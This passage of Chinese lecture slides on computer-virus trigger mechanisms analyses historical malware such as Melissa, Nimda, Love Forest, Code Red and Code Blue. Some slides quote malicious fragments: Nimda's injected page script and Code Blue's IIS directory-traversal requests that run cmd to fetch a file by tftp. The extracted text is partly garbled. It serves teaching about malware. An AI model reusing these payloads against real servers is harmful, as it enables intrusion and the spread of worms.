91 VxD 文件结构 正因为如此,VxD 在 Windows 系统编程中有广泛用途, 其实大家一般都是碰到 Windows API 不能解决或者难以解决的问题才考虑编写 VxD 解决问题 91

92 第 5 部分 计算机病毒的触发机制 92

93 日期触发 特定日期触发 每月某日定期触发 某日为界分时段进行感染和破坏 93

94 月份触发 1991 年 1 月, 在法国发现的 903 病毒, 主要感染 com 文件, 感染后文件增加 903B, 病毒程序附在宿主程序的头部 当系统日期为 3 月份时, 病毒发作, 病毒将现行驱动器的每道前 6 个扇区覆盖 94

95 前半年 后半年触发 Got-you 病毒 1-6 月, 感染硬盘上的 exe 文件 7-12 月, 不感染, 执行某种破坏动作 95

96 时间触发 时间触发的方式主要有 3 种 特定的时间触发 染毒后累积工作时间触发 文件最后写入时间触发 96

97 特定的时间触发 特定的时间触发是指病毒程序对时间进行判别, 当达到某一特定时刻时, 病毒发作, 执行破坏行为 小球 病毒 杨基歌 (Yankee Doodle) 病毒 梅莉莎 (Melissa) 病毒 97

98 染毒后累积工作时间触发 dbase 病毒 磁盘杀手 (Disk Killer) 病毒 98

99 文件最后写入时间触发 1991 年 5 月产于意大利的研究性病毒 Ah, 感染 com 文件, 染毒文件增长 1173B 当发现原文件的最后写入时间是 12:00 时, 将破坏感染的文件 99

100 键盘触发 有些病毒会监视键盘, 当操作人员按某个键或组合键时, 病毒发作 按键次数触发 组合键触发 - Alameda 病毒 Yap 病毒 热启动触发 100

101 感染信息触发 许多病毒感染需要某些条件, 而有相当数量的病毒又以与感染相关的信息反馈来作为其破坏行为的触发条件 感染文件个数触发 - 黑色星期一 (Black Monday) 病毒 CD 病毒 感染序数触发 - 杨基歌 (Yankee Doodle) 病毒 VHP2 病毒 感染磁盘触发 -Golden Gate( 金门 ) 感染失败触发 101

102 启动触发 启动触发是预设一个计算机的启动次数, 并以此作为病毒的触发条件, 激活病毒 1. Anti-Tel 病毒 2. Telecom 病毒 3. 屏幕保护变种 (W32/Opaserv.worm.n) 病毒 4. Trojan/Beway 病毒 102

103 访问磁盘次数触发 病毒程序将访问磁盘次数作为触发条件, 即病毒程序运行时, 对磁盘 I/O 访问的次数进行计数, 当到达指定的访问次数时, 激活病毒, 此种方式称为访问磁盘次数触发 典型病毒 Print Screen 103

104 调用中断功能触发 病毒对中断功能调用次数计数, 以预定次数作触发条件 1991 年 9 月发现于南非的 Poem 病毒, 常驻内存, 感染 com 文件, 文件增长 B, 病毒附在宿主程序尾部 病毒常驻内存后, 对中断 INT21H 的调用次数进行计数, 当计数到 2112 时, 屏幕显示病毒信息 每年的 12 月 21 日激活, 除了显示病毒信息, 硬盘前 1221 个扇区被覆盖 104

105 CPU 型号触发 1990 年 12 月美国出现的 Violator B4, 感染 com 文件, 文件增长 5308B 8088CPU, 病毒除了感染不作其他动作 及以上 CPU, 病毒立即激活, 将系统硬盘的开头部分覆盖, 并显示圣诞节的问候信息 105

106 打开邮件触发 普通邮件型病毒 梅莉莎 (Melisa) 病毒 尼姆达病毒 106

107 梅莉莎病毒 1. 梅莉莎 (Melisa) 病毒 S1: 用户打开感染该病毒的文件, 病毒检测注册表里是否有其注册的信息 S2: 利用 VB 指令建立一个 Outlook 对象, 获得 Outlook 全域地址中的成员地址信息, 以电子邮件的形式, 每次发送到 50 邮箱 将已感染的文件作为附件 107

108 梅莉莎病毒 1. 梅莉莎 (Melisa) 病毒 S3: 用户打开该附件后,Word 系统所有打开的文件被传染, 并攻击 Word 的注册器, 修改预防宏病毒的安全设置, 使之具有的宏病毒预警功能丧失 108

109 尼姆达病毒 2. 尼姆达 (Nimda) 病毒 Worms.Nimda 是一个新型蠕虫, 也是一个病毒, 它通过 共享网络资源 IIS 服务器传播 同时它也是一个 同时它也是一个感染本地文件的新型病毒 109

110 尼姆达病毒 2. 尼姆达 (Nimda) 病毒传播方式 通过电子邮件从一个客户端感染另一个客户端 通过开放的网络共享从一个客户端感染另一个客户端 通过浏览被感染的网站从 Web 服务器感染客户端 110

111 尼姆达病毒 2. 尼姆达 (Nimda) 病毒传播方式 通过主动扫描或利用 Microsoft IIS 4.0 / 5.0 directory traversal 的缺陷从客户端感染 Web 服务器 通过扫描 Code Red (IN ), 09), 和 sadmind/iis (CA ) 11) 留下的后门从客户端感染 Web 服务器 111

112 尼姆达病毒 2. 尼姆达 (Nimda) 病毒感染服务器 被感染的机器会发送一份 Nimda 病毒代码复本到任何在扫描中发现有漏洞的服务器 一旦在该服务器上运行, 蠕虫就会遍历系统里的每一个目录 ( 甚至包括所有通过共享文件可以读取得目录 ), 然后会在磁盘里留下一份自身拷贝, 取名为 "README.EML" 112

113 尼姆达病毒 2. 尼姆达 (Nimda) 病毒感染服务器 一旦找到了含有 web 内容的目录 ( 包含 html 或 asp 文件 ), 下面 Javascript 代码段就会被添加到每一个跟 web 有关的文件中 : <script language= "JavaScript"> window.open("readme.eml readme.eml", null, "resizable=no, top= 6000,left=6000") </script> 这段代码使得蠕虫可以进一步繁衍, 通过浏览器或浏览网络文件感染到新的客户端 113

114 尼姆达病毒 2. 尼姆达 (Nimda) 病毒 通过浏览器传播作为感染过程的一部分,Nimda, 更改所有的含有 web 内容的文件 ( 象.htm,,html,.asp 等文件 ) 这样, 任何用户浏览该文件, 不管是通过浏览器还是网络, 就可能会下载一份该病毒 有些浏览器会自动的执行下载动作, 感染正在浏览该网站的机器 114

115 尼姆达病毒 2. 尼姆达 (Nimda) 病毒 通过文件系统感染 Nimda 病毒生成大量的自身的复本, 取名为 README.EML, 写到该用户有可写权限的目录里 如果在另一台机器的用户通过网络共享选取病毒文件, 并且设置了预览功能的话, 蠕虫就会威胁到这台新的机器 115

116 尼姆达病毒 2. 尼姆达 (Nimda) 病毒感染 PE 文件 Worms.Nimda 感染本地 PE 文件的两种方法 一种是查找所有的 WINDOWS 应用程序 ( 在 KEY_LOCAL_ MACHINE/ Software/Microsoft/Windows/Currentvers ion/app Paths 中 ),, 并试图感染之, 但不感染 WINZIP32.EXE 第二种方法搜索所有文件, 并试图感染之 被感染的文件会增大约 57KB 116

117 尼姆达病毒 2. 尼姆达 (Nimda) 病毒 如果用户游览了一个已经被感染的 web 页时, 就会被提示下载一个.eml(Outlook Express) 的电子邮件文件, 其 MIME 头是一个非正常 MIME 头, 包含一个蠕虫附件 117

118 尼姆达病毒 2. 尼姆达 (Nimda) 病毒 这种邮件也可能是别人通过网络共享存入你的计算机中, 也可能是在别人的共享目录中 只要你在 WINDOWS 的资源管理器中选中该文件,WINDOWS, 将自动预览该文件, 由于 Outlook Express 的漏洞, 导致蠕虫自动运行, 因此即使你不打开文件, 也可能中毒 118

119 尼姆达病毒 2. 尼姆达 (Nimda) 蠕虫执行的时候 在 WINDOWS 目录下生成 MMC.EXE 文件, 并将其属性改为系统 隐藏 会用自己覆盖 SYSTEM 目录下的 RICHED20.DLL, 这个文件是 OFFICE 套件运行的必备库,WINDOWS, 的写字板等也要用到这个动态库, 任何要使用这个动态库的程序试图启动时, 都会激活它 119

120 尼姆达病毒 2. 尼姆达 (Nimda) 蠕虫执行的时候 将自己复制到 SYSTEM 目录下, 并改名为 LOAD.EXE, 同时将 SYSTEM.INI 文件中的 SHELL 项改为 explorer.exe load.exe dontrunold, 这样, 在系统每次启动时, 将自动运行它 这个蠕虫会在已经感染的计算机共享所有本地硬盘 120

121 尼姆达病毒 2. 尼姆达 (Nimda) 蠕虫执行的时候 同时, 这个蠕虫会以超级管理员的权限建立一个 guest 的访问帐号, 以允许别人进入本地的系统 这个蠕虫改变 Explorer 的设置这样就让它无法显示隐藏文件和已知文件的扩展名 121

122 随机触发 爱情森林 (trojan.sckiss( trojan.sckiss) 病毒 122

123 爱情森林 爱情森林 (trojan.sckiss( trojan.sckiss) 病毒 爱情森林 病毒的制作者利用 QQ 聊天机制, 向用户发送 这个你去看看! 很好看 的信息 如果用户收到此信息, 并点击该链接, 则会进入一个包含恶性攻击代码的恶意网页, 此时病毒将会被自动下载并发作 同时, 病毒还会利用用户的 QQ 好友名单, 继续向外扩散 123

124 爱情森林 爱情森林 (trojan.sckiss( trojan.sckiss) 病毒 该恶意网页用 JS 脚本语言编写, 利用了 JAVA EXPLOIT 漏洞, 所以不经用户的允许, 便可以悄悄自动下载 爱情森林 病毒并执行 而后此恶意网页会修改用户注册表以进行破坏, 并将用户的 IE 标题和 IE 默认首页改为 :sckiss.yeah.net: sckiss.yeah.net/ 爱情森林 同时使用户的 运行 菜单项无法使用, 并将这个网址也加入注册表中的 RUN 自启动项 124

125 爱情森林 爱情森林 (trojan.sckiss( trojan.sckiss) 病毒 目前, 网络上使用 QQ 软件的注册人数已经超过 1 个亿, 而从今年病毒的发作情况来看, 已经有将近 100 种 QQ 类型的病毒出现 由此可以看出, 利用 QQ 这类通讯工具来进行传播的病毒, 已经逐渐成为新病毒的流行趋势 125

126 爱情森林 爱情森林 (trojan.sckiss( trojan.sckiss) 病毒 爱情森林 病毒分析于 2002 年 8 月 23 日上午开始通过 QQ 聊天程序快速扩散的 QQ 恶性木马病毒 爱情森林 (Trojan.Sckiss) 126

127 爱情森林 爱情森林 (trojan.sckiss( trojan.sckiss) 病毒 爱情森林 病毒分析 病毒基本资料 : 病毒名 :Trojan.Sckiss: 病毒长度 :176,643: 字节 病毒原名 :HACK.EXE: 原始病毒邮件名 :s.eml: 127

128 爱情森林 爱情森林 (trojan.sckiss( trojan.sckiss) 病毒 此病毒用 UPX 软件进行压缩, 压缩后大小接近 200K, 是一个异常庞大的病毒 而且此病毒利用了多种方式进行传播 : 本机感染,QQ, 诱骗 网页帮凶, 所以有极强的传播能力 128

129 爱情森林 爱情森林 (trojan.sckiss( trojan.sckiss) 病毒的特性 一 利用邮件包装, 形成自启动邮件 病毒的原始文件是一个名为 HACK.EXE 的木马病毒, 病毒作者为了能使病毒 初战告捷, 迅速占领用户计算机, 利用了 OUTLOOK 的邮件漏洞, 将原始病毒包装成一个可以预览执行的病毒邮件 :s.eml: s.eml, 然后放入一个恶意网页中, 等待下载 129

130 爱情森林 爱情森林 (trojan.sckiss( trojan.sckiss) 病毒的特性二 利用 QQ 工具, 发送伪装信息 如果用户不小心点击或预览了病毒邮件, 病毒便可执行 病毒执行时会搜索用户的 QQ 程序 130

131 爱情森林 爱情森林 (trojan.sckiss( trojan.sckiss) 病毒的特性二 利用 QQ 工具, 发送伪装信息 如果用户在线的话, 病毒会伪装成用户, 给用户的所有在线的好友发送一条用户无法查觉的隐藏信息, 此信息的内容为 : 这个你去看看! 很好看的 如果用户的好友在收到了此信息后, 因为好奇而点击了此链接, 则会进入一个恶意网页 131

132 爱情森林 爱情森林 (trojan.sckiss( trojan.sckiss) 病毒的特性三 利用恶意网页帮凶, 导致病毒泛滥 该恶意网页用 JS 语言编写, 利用了 JAVA EXPLOIT 漏洞, 所以不经用户的允许, 便可以悄悄运行自动下载 爱情森林 病毒邮件 (s.eml) 并执行 132

133 爱情森林 爱情森林 (trojan.sckiss( trojan.sckiss) 病毒的特性三 利用恶意网页帮凶, 导致病毒泛滥. 然后此恶意网页会修改用户注册表进行破坏 : 将用户的 IE 标题改为 :sckiss.yeah.net: / 爱情森林,IE 默认首页改为 : sckiss: sckiss. yeah.net/ 将此网址加入注册表中的 RUN 自启动项 这样以来, 无论用户启动计算机还是启动 IE 浏览器, 都可以自动链接到恶意网页, 感染病毒 133

134 爱情森林 爱情森林 (trojan.sckiss( trojan.sckiss) 病毒的特性四 侵占系统目录, 继续 生生不息 爱情森林 病毒通过 QQ 发送信息之后, 便开始进行本机的感染 病毒首先改名为 : EXPLORER.EXE, 然后将之拷贝到 WINDOWS 的系统目录 (SYSTEM 或 SYSTEM32) 下, 这样用户即使发现也不会起疑心 134

135 爱情森林 爱情森林 (trojan.sckiss( trojan.sckiss) 病毒的特性四 侵占系统目录, 继续 生生不息 然后病毒修改注册表, 在 RUN 的自启动项中建立一个 EXPLORER 的键值, 将病毒路径加入其中, 一旦计算机重启, 病毒便可自动运行, 再次进行以上感染 135

136 利用系统及软件漏洞触发 红色代码 红色代码 II 蓝色代码 136

137 红色代码 解析 红色代码 病毒 红色代码 (Red( Code) 是一种蠕虫病毒, 感染运行 Microsoft Index Server 2.0 的系统, 或是在 Windows 2000 IIS 中启用了 Indexing Service( 索引服务 ) 的系统 该蠕虫利用了一个缓冲区溢出漏洞进行传播 ( 未加限制的 Index Server IS API Extension 缓冲区使 WEB 服务器变的不安全 ) 137

138 红色代码 解析 红色代码 病毒 蠕虫的传播是通过 TCP/IP 协议和端口 80,, 利用上述漏洞, 蠕虫将自己作为一个 TCP/IP 流直接发送到染毒系统的缓冲区, 蠕虫依次扫描 WEB, 以便能够感染其他的系统 一旦感染了当前的系统, 蠕虫会检测硬盘中是否存在 c:\notworm notworm, 如果该文件存在, 蠕虫将停止感染其他主机 138

139 红色代码 解析 红色代码 病毒 在每月的 日, 向特定 IP 地址 ( 发动攻击 Code Red 主要有如下特征 : 入侵 IIS 服务器, code red 会将 WWW 英文站点改写为 "Hello! Welcome to Hacked by Chinese!" 139

140 红色代码 II 解析 红色代码 II 病毒 红色代码 II 是 红色代码 的改良版, 病毒作者对病毒体作了很多优化, 它继承了 红色代码 病毒的攻击特点, 同样可以对 红色代码 病毒可攻击的联网计算机发动进攻 140

141 红色代码 II 解析 红色代码 II 病毒 与 红色代码 不同的是, 这种新变型不仅仅只对英文系统发动攻击, 而且可以攻击任何语言的系统 这种病毒可以在遭到攻击的机器上植入 特洛伊木马,, 使得被攻击的机器 后门大开 红色代码 II 拥有极强的可扩充性, 通过程序自行完成的木马植入工作, 使得病毒作者可以通过改进此程序来达到不同的破坏目的 141

142 红色代码 II 解析 红色代码 II 病毒 当本地 IIS 服务程序收到某个来自 红色代码 发送的请求数据包时, 由于存在漏洞, 导致处理函数的堆栈溢出 当函数返回时, 原返回地址已被病毒数据包覆盖, 程序运行先跑到病毒数据包中, 此时病毒被激活, 并运行在 IIS 服务程序的堆栈中 142

143 红色代码 II 解析 红色代码 II 病毒 该病毒代码首先会判断内存中是否已注册了一个名为 CodeRedII 的 Atom( 系统用于对象识别 ), 如果已存在此对象, 表示此机器已被感染, 病毒进入无限休眠状态 未感染, 则注册 Atom 并创建 300 个病毒线程 143

144 红色代码 II 解析 红色代码 II 病毒 当判断到系统默认的语言 ID 是中华人民共和国或中国台湾时, 线程数猛增到 600 个, 创建完毕后初始化病毒体内的一个随机数发生器, 此发生器产生用于病毒感染的目标电脑 IP 地址 每个病毒线程每 100 毫秒就会向一随机地址的 80 端口发送一长度为 3818 字节的病毒传染数据包 巨大的病毒数据包使网络陷于瘫痪 144

145 红色代码 II 解析 红色代码 II 病毒 红色代码 II 病毒体内还包含一个木马程序, 这意味着计算机黑客可以对受到入侵的计算机实施全程遥控, 并使得 红色代码 II 拥有前身无法比拟的可扩充性, 只要病毒作者愿意, 随时可更换此程序来达到不同的目的 145

146 蓝色代码 该病毒能利用操作系统 WinNT/ Win2000 的 IIS 的服务器漏洞, 可以像红色代码一样的入侵服务器 由远端的客户端非法将黑客程序伪装成 svchost.exe 复制到 c: 盘根目录下, 并运行多个 svchost.exe 程序直至系统资源耗尽, 导致系统瘫痪 146

147 蓝色代码 - 本机的操作 约定 : 开始感染其它机器者称为本机 被感染对象称为目标主机 在本机上的操作, 初始传染的准备工作 httpext.dll 在 C 盘根目录 ( 在机器间传播的病毒文件 ) 147

148 本机的操作 启动 svchost.exe 调用 _beginthread 函数 注册 HKEY_LOCAL_MA CHINE/SOFTWARE /MICROSOFT/WIN DOWS/CURRENTV ERSION/RUN 一个窗口类, 类名为 worm 设一个已感染标识, 为一全局的名为 CodeBlue 的原子 (GlobalAtom) 修改注册表, 启动系统时自动运行 svchost.exe 将 C:svchost.exe 和 C: httpext.dll 改为系统隐藏属性 产生 C:D.VBS, 并启动 wscript.exe 运行该文件 创建一个线程, 可建立一个基本 UDP 协议的文件传输服务器, 即 tftp 服务器 调用 _beginthread 函数创建 100 个感染线程休眠 5 秒后将本机的 C:D.VBS 文件删除 148

149 蓝色代码 - 感染线程的工作过程 调用 API GetSystemTime 取本机系统当前时间 随机生成一个 IP 地址 连接目标主机的 80 端口 连接成功 再向目标主机发送请求 HEAD / HTTP/1.0 请求, 目标主机回答是否支持 HTTP 1.0 且为 IIS 服务器 是 IIS 服务器 检测目标主机的 IIS 服务器的 UNICODE 漏洞 GET /scripts/.. %c1 %1c.. httpext.dll GET/scripts/ 检查目标主机.. %c1 %1c../ /winnt /system32 /cmd? 是否被感染 winnt /system32, 如无则生成 /cmd?/c+ /c+dir GET /scripts/ svchost.exe, copy+httpext.dll+c:.. %c1 并运行它 %1c.. /winnt/system32/cmd?/c+t ftp+-i get+ 运行目标主机 IIS 服务器 httpext.dll scripts 目录中的 httpext.dll 连接失败 不是 IIS 服务器 GET/script s/httpext.dl l 把目标主机 scripts 目录下 httpext.dll 文件拷贝到 C 盘根目录 启动目标主机 tftp.exe 程序, 从本机取 httpext.dll, 放在 scripts 目录中 149

150 多条件触发 将多个触发条件相互搭配并用是该类病毒的一个特点 这类病毒使用的触发条件往往不是一个, 常常是多个触发条件并用, 或巧妙搭配, 使病毒既具有隐藏性又有强杀伤力 可以满足其中的一个条件, 或者所有的条件才发作 150

Windows XP

Windows XP Windows XP What is Windows XP Windows is an Operating System An Operating System is the program that controls the hardware of your computer, and gives you an interface that allows you and other programs

More information

ebook140-9

ebook140-9 9 VPN VPN Novell BorderManager Windows NT PPTP V P N L A V P N V N P I n t e r n e t V P N 9.1 V P N Windows 98 Windows PPTP VPN Novell BorderManager T M I P s e c Wi n d o w s I n t e r n e t I S P I

More information

Microsoft Word - template.doc

Microsoft Word - template.doc HGC efax Service User Guide I. Getting Started Page 1 II. Fax Forward Page 2 4 III. Web Viewing Page 5 7 IV. General Management Page 8 12 V. Help Desk Page 13 VI. Logout Page 13 Page 0 I. Getting Started

More information

第1章 QBASIC语言概述

第1章  QBASIC语言概述 第 3 章 网 络 安 全 学 习 目 的 (1) 了 解 计 算 机 网 络 安 全 的 基 础 知 识 (2) 熟 悉 网 络 安 全 防 范 的 措 施 与 目 标 (3) 了 解 计 算 机 病 毒 的 基 础 知 识 (4) 掌 握 计 算 机 病 毒 的 预 防 检 测 与 清 除 方 法 学 习 重 点 与 难 点 (1) 网 络 安 全 防 范 措 施 (2) 计 算 机 病 毒 的

More information

Microsoft Word - TIP006SCH Uni-edit Writing Tip - Presentperfecttenseandpasttenseinyourintroduction readytopublish

Microsoft Word - TIP006SCH Uni-edit Writing Tip - Presentperfecttenseandpasttenseinyourintroduction readytopublish 我 难 度 : 高 级 对 们 现 不 在 知 仍 道 有 听 影 过 响 多 少 那 次 么 : 研 英 究 过 文 论 去 写 文 时 作 的 表 技 引 示 巧 言 事 : 部 情 引 分 发 言 该 生 使 在 中 用 过 去, 而 现 在 完 成 时 仅 表 示 事 情 发 生 在 过 去, 并 的 哪 现 种 在 时 完 态 成 呢 时? 和 难 过 道 去 不 时 相 关? 是 所 有

More information

ebook140-8

ebook140-8 8 Microsoft VPN Windows NT 4 V P N Windows 98 Client 7 Vintage Air V P N 7 Wi n d o w s NT V P N 7 VPN ( ) 7 Novell NetWare VPN 8.1 PPTP NT4 VPN Q 154091 M i c r o s o f t Windows NT RAS [ ] Windows NT4

More information

Guide to Install SATA Hard Disks

Guide to Install SATA Hard Disks SATA RAID 1. SATA. 2 1.1 SATA. 2 1.2 SATA 2 2. RAID (RAID 0 / RAID 1 / JBOD).. 4 2.1 RAID. 4 2.2 RAID 5 2.3 RAID 0 6 2.4 RAID 1.. 10 2.5 JBOD.. 16 3. Windows 2000 / Windows XP 20 1. SATA 1.1 SATA Serial

More information

典型自编教材

典型自编教材 河 南 科 技 大 学 计 算 机 实 验 教 学 中 心 1. 计 算 机 文 化 基 础 实 验 指 导 书 2. 数 据 结 构 实 验 指 导 书 3. 操 作 系 统 实 验 指 导 书 4. 面 向 对 象 程 序 设 计 实 验 指 导 书 5. 数 据 库 原 理 实 验 指 导 书 6. 编 译 原 理 实 验 指 导 书 7. JAVA 程 序 设 计 实 验 指 导 书 8.

More information

计算机维护与服务规范 精品在线开放课程 软件常见问题 一 硬盘数据结构初买来一块硬盘, 我们是没有办法使用的, 你需要将它分区 格式化, 然后再安装上操作系统才可以使用 就拿我们一直沿用到现在的 Windows 9x/Me 系列来说, 我们一般要将硬盘分成主引导扇区 操作系统引导扇区 FAT DIR

计算机维护与服务规范 精品在线开放课程 软件常见问题 一 硬盘数据结构初买来一块硬盘, 我们是没有办法使用的, 你需要将它分区 格式化, 然后再安装上操作系统才可以使用 就拿我们一直沿用到现在的 Windows 9x/Me 系列来说, 我们一般要将硬盘分成主引导扇区 操作系统引导扇区 FAT DIR 一 硬盘数据结构初买来一块硬盘, 我们是没有办法使用的, 你需要将它分区 格式化, 然后再安装上操作系统才可以使用 就拿我们一直沿用到现在的 Windows 9x/Me 系列来说, 我们一般要将硬盘分成主引导扇区 操作系统引导扇区 FAT DIR 和 Data 等五部分 ( 其中只有主引导扇区是唯一的, 其它的随你的分区数的增加而增加 ) 二 主引导扇区主引导扇区位于整个硬盘的 0 磁道 0 柱面

More information

K7VT2_QIG_v3

K7VT2_QIG_v3 ............ 1 2 3 4 5 [R] : Enter Raid setup utility 6 Press[A]keytocreateRAID RAID Type: JBOD RAID 0 RAID 1: 2 7 RAID 0 Auto Create Manual Create: 2 RAID 0 Block Size: 16K 32K

More information

AL-MX200 Series

AL-MX200 Series PostScript Level3 Compatible NPD4760-00 TC Seiko Epson Corporation Seiko Epson Corporation ( ) Seiko Epson Corporation Seiko Epson Corporation Epson Seiko Epson Corporation Apple Bonjour ColorSync Macintosh

More information

软件测试(TA07)第一学期考试

软件测试(TA07)第一学期考试 一 判 断 题 ( 每 题 1 分, 正 确 的, 错 误 的,20 道 ) 1. 软 件 测 试 按 照 测 试 过 程 分 类 为 黑 盒 白 盒 测 试 ( ) 2. 在 设 计 测 试 用 例 时, 应 包 括 合 理 的 输 入 条 件 和 不 合 理 的 输 入 条 件 ( ) 3. 集 成 测 试 计 划 在 需 求 分 析 阶 段 末 提 交 ( ) 4. 单 元 测 试 属 于 动

More information

國家圖書館典藏電子全文

國家圖書館典藏電子全文 i ii Abstract The most important task in human resource management is to encourage and help employees to develop their potential so that they can fully contribute to the organization s goals. The main

More information

IP TCP/IP PC OS µclinux MPEG4 Blackfin DSP MPEG4 IP UDP Winsock I/O DirectShow Filter DirectShow MPEG4 µclinux TCP/IP IP COM, DirectShow I

IP TCP/IP PC OS µclinux MPEG4 Blackfin DSP MPEG4 IP UDP Winsock I/O DirectShow Filter DirectShow MPEG4 µclinux TCP/IP IP COM, DirectShow I 2004 5 IP TCP/IP PC OS µclinux MPEG4 Blackfin DSP MPEG4 IP UDP Winsock I/O DirectShow Filter DirectShow MPEG4 µclinux TCP/IP IP COM, DirectShow I Abstract The techniques of digital video processing, transferring

More information

ch_code_infoaccess

ch_code_infoaccess 地 產 代 理 監 管 局 公 開 資 料 守 則 2014 年 5 月 目 錄 引 言 第 1 部 段 數 適 用 範 圍 1.1-1.2 監 管 局 部 門 1.1 紀 律 研 訊 1.2 提 供 資 料 1.3-1.6 按 慣 例 公 布 或 供 查 閱 的 資 料 1.3-1.4 應 要 求 提 供 的 資 料 1.5 法 定 義 務 及 限 制 1.6 程 序 1.7-1.19 公 開 資

More information

高 职 计 算 机 类 优 秀 教 材 书 目 * 序 号 书 号 (ISBN) 书 名 作 者 定 价 出 版 / 印 刷 日 期 ** 配 套 资 源 页 码 计 算 机 基 础 课 1 978-7-111-30658-0 计 算 机 应 用 基 础 刘 升 贵 29.00 2012 年 8 月

高 职 计 算 机 类 优 秀 教 材 书 目 * 序 号 书 号 (ISBN) 书 名 作 者 定 价 出 版 / 印 刷 日 期 ** 配 套 资 源 页 码 计 算 机 基 础 课 1 978-7-111-30658-0 计 算 机 应 用 基 础 刘 升 贵 29.00 2012 年 8 月 高 职 计 算 机 类 优 秀 教 材 书 目 * 序 号 书 号 (ISBN) 书 名 作 者 定 价 出 版 / 印 刷 日 期 ** 配 套 资 源 页 码 计 算 机 基 础 课 1 978-7-111-30658-0 计 算 机 应 用 基 础 刘 升 贵 29.00 2012 年 8 月 电 子 教 案 P1 2 978-7-111-27081-2 计 算 机 应 用 基 础 ( 第 2

More information

Serial ATA ( Silicon Image SiI3114)...2 (1) SATA... 2 (2) B I O S S A T A... 3 (3) RAID BIOS RAID... 5 (4) S A T A... 8 (5) S A T A... 10

Serial ATA ( Silicon Image SiI3114)...2 (1) SATA... 2 (2) B I O S S A T A... 3 (3) RAID BIOS RAID... 5 (4) S A T A... 8 (5) S A T A... 10 Serial ATA ( Silicon Image SiI3114)...2 (1) SATA... 2 (2) B I O S S A T A... 3 (3) RAID BIOS RAID... 5 (4) S A T A... 8 (5) S A T A... 10 Ác Åé å Serial ATA ( Silicon Image SiI3114) S A T A (1) SATA (2)

More information

The Development of Color Constancy and Calibration System

The Development of Color Constancy and Calibration System The Development of Color Constancy and Calibration System The Development of Color Constancy and Calibration System LabVIEW CCD BMP ii Abstract The modern technologies develop more and more faster, and

More information

UDC The Design and Implementation of a Specialized Search Engine Based on Robot Technology 厦门大学博硕士论文摘要库

UDC The Design and Implementation of a Specialized Search Engine Based on Robot Technology 厦门大学博硕士论文摘要库 10384 200128011 UDC The Design and Implementation of a Specialized Search Engine Based on Robot Technology 2004 5 2004 2004 2004 5 World Wide Web Robot Web / (Focused Crawling) Web Meta data Web Web I

More information

Chn 116 Neh.d.01.nis

Chn 116 Neh.d.01.nis 31 尼 希 米 书 尼 希 米 的 祷 告 以 下 是 哈 迦 利 亚 的 儿 子 尼 希 米 所 1 说 的 话 亚 达 薛 西 王 朝 二 十 年 基 斯 流 月 *, 我 住 在 京 城 书 珊 城 里 2 我 的 兄 弟 哈 拿 尼 和 其 他 一 些 人 从 犹 大 来 到 书 珊 城 我 向 他 们 打 听 那 些 劫 后 幸 存 的 犹 太 人 家 族 和 耶 路 撒 冷 的 情 形

More information

目次 

目次  軟 體 工 程 期 末 報 告 網 路 麻 將 91703014 資 科 三 黃 偉 嘉 91703024 資 科 三 丘 祐 瑋 91703030 資 科 三 江 致 廣 1 目 次 壹 前 言 (Preface) P.4 貳 計 畫 簡 述 及 預 期 效 益 (Project Description and Expected Results) P.4 參 系 統 開 發 需 求 (System

More information

Panaboard Overlayer help

Panaboard Overlayer help Panaboard Overlayer Image Capture Software for Electronic Whiteboard (Panaboard) ... 3... 5... 6... 13...14 Panaboard Overlayer 1. 2. 3. 4. 4-1. 4-2. [ / ] ( ) 4-3. 5. 6. 6-1. 6-2. [ / ] ( ) 7. Panaboard

More information

2015年4月11日雅思阅读预测机经(新东方版)

2015年4月11日雅思阅读预测机经(新东方版) 剑 桥 雅 思 10 第 一 时 间 解 析 阅 读 部 分 1 剑 桥 雅 思 10 整 体 内 容 统 计 2 剑 桥 雅 思 10 话 题 类 型 从 以 上 统 计 可 以 看 出, 雅 思 阅 读 的 考 试 话 题 一 直 广 泛 多 样 而 题 型 则 稳 中 有 变 以 剑 桥 10 的 test 4 为 例 出 现 的 三 篇 文 章 分 别 是 自 然 类, 心 理 研 究 类,

More information

LAMP system and relative tools like SNMP, Expect, Nmap, etc. to build a cross- platform, lo

LAMP system and relative tools like SNMP, Expect, Nmap, etc. to build a cross- platform, lo cchu@ttu.edu.tw jacklin@ttu.edu.tw twt@mail.chihlee.edu.tw LAMP system and relative tools like SNMP, Expect, Nmap, etc. to build a cross- platform, low cost and modulized monitoring, managing, and recovering

More information

IP505SM_manual_cn.doc

IP505SM_manual_cn.doc IP505SM 1 Introduction 1...4...4...4...5 LAN...5...5...6...6...7 LED...7...7 2...9...9...9 3...11...11...12...12...12...14...18 LAN...19 DHCP...20...21 4 PC...22...22 Windows...22 TCP/IP -...22 TCP/IP

More information

Microsoft PowerPoint - CH 04 Techniques of Circuit Analysis

Microsoft PowerPoint - CH 04 Techniques of Circuit Analysis Chap. 4 Techniques of Circuit Analysis Contents 4.1 Terminology 4.2 Introduction to the Node-Voltage Method 4.3 The Node-Voltage Method and Dependent Sources 4.4 The Node-Voltage Method: Some Special Cases

More information

Olav Lundström MicroSCADA Pro Marketing & Sales 2005 ABB - 1-1MRS755673

Olav Lundström MicroSCADA Pro Marketing & Sales 2005 ABB - 1-1MRS755673 Olav Lundström MicroSCADA Pro Marketing & Sales 2005 ABB - 1 - Contents MicroSCADA Pro Portal Marketing and sales Ordering MicroSCADA Pro Partners Club 2005 ABB - 2 - MicroSCADA Pro - Portal Imagine that

More information

Microsoft PowerPoint - Aqua-Sim.pptx

Microsoft PowerPoint - Aqua-Sim.pptx Peng Xie, Zhong Zhou, Zheng Peng, Hai Yan, Tiansi Hu, Jun-Hong Cui, Zhijie Shi, Yunsi Fei, Shengli Zhou Underwater Sensor Network Lab 1 Outline Motivations System Overview Aqua-Sim Components Experimental

More information

epub 61-2

epub 61-2 2 Web Dreamweaver UltraDev Dreamweaver 3 We b We b We Dreamweaver UltraDev We b Dreamweaver UltraDev We b We b 2.1 Web We b We b D r e a m w e a v e r J a v a S c r i p t We b We b 2.1.1 Web We b C C +

More information

Microsoft PowerPoint - TTCN-Introduction-v5.ppt

Microsoft PowerPoint - TTCN-Introduction-v5.ppt Conformance Testing and TTCN 工研院無線通訊技術部林牧台 / Morton Lin 03-5912360 mtlin@itri.org.tw 1 Outline Introduction and Terminology Conformance Testing Process 3GPP conformance testing and test cases A real world

More information

ClientHelpSymantec™ Endpoint Protection 及 Symantec Network Access Control 客户端指南

